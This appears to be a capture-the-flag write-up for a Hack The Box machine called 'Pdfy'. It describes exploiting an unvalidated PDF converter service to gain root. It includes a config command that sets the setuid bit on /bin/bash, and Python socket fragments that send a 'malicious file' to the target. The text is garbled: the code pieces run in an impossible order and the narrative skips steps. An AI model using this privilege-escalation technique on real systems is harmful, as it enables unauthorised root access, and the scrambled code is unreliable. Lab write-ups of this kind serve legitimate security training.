Htb Writeup Upd — Pdfy

Next, we proceed to enumerate the web server on port 80. We access the website using our browser and notice that it appears to be a simple web application with a search functionality. We also observe that the website uses a .pdf extension for its pages, which could indicate that the PDF converter service on port 8080 might be related to the web application.

# Receive the response
response = s.recv(1024)

# Close the socket
s.close()

We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and Burp Suite, we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-supplied files, which could potentially lead to code execution vulnerabilities.

{
  "converter": {
    "command": "/usr/bin/python -c 'import os; os.system(\"chmod +s /bin/bash\")'"
  }
}

After restarting the pdfy-converter service, we verify that the /bin/bash shell has been modified to have setuid permissions. We then execute the /bin/bash shell to gain root access.

# Send the malicious file
s.send(malicious_file.encode())

# Connect to the PDF converter service
s.connect(('10.10.11.232', 8080))

# Define the malicious file contents
malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…"